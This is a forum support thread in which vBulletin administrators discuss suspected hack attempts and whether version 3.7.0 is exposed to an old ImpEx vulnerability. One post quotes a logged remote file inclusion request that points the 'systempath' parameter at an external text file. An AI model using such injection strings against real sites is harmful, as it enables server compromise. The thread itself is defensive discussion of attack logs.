Announcement

Collapse
No announcement yet.

Potential hack??

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    Originally posted by Sheridan View Post
    Thank you...

    I have 3.7.0.. so am I screwed?
    I would say no. 3.7.0 was released April 2008.
    Don't forget, this was posted almost 3 years ago!
    Although, I would stay current on your versions.

    Edit: Open your forum and go to sleep.

    And more reading.
    http://www.securityfocus.com/bid/17206
    Vulnerable: VBulletin ImpEx 1.74
    - VBulletin VBulletin 3.5.4
    - VBulletin VBulletin 3.5.3
    - VBulletin VBulletin 3.5.2
    - VBulletin VBulletin 3.5.1
    1) You don't have ImpEx installed.
    2) You have v 3.7.0.
    ...steven
    www.318ti.org (vB3.8) | www.nccbmwcca.org (vB4.2)
    bmwcca.org/forum | m135i.net
    "I tried to clean this up but this thread is beyond redemption." - Steve Machol

    Comment


    • #17
      I went to sleep....and then got up and opened my forum!

      Thank you!!!

      Comment


      • #18
        We have been getting similar attacks from some of the same IP's.

        According to another post, this is an effort to exploit an old bug. However, the fact that these just started up in the past couple days, and that several people have reported them makes me wonder.

        Example:
        .../ForumVB/index.php/impex/ImpExModule.php?systempath=http://www.henneferkanuteam.de/apboard/info.txt????
        I suspect it is some random bot trying to attack any VB board hoping to find a version with the exploit unfixed, it is just the sudden appearance of these attacks that makes me wonder.
        Last edited by Windsun; Mon 5 Jan '09, 10:11pm.

        Comment


        • #19
          I get these attempts daily on my forum, and mine is a quiet forum anyway. But at the end of the day, all the time you use the MOST up to date version of vBulletin, they are nothing more then attempts.
          http://data.collectiveirc.net/status/user/Jobe.png

          Comment

          widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
          Working...
          X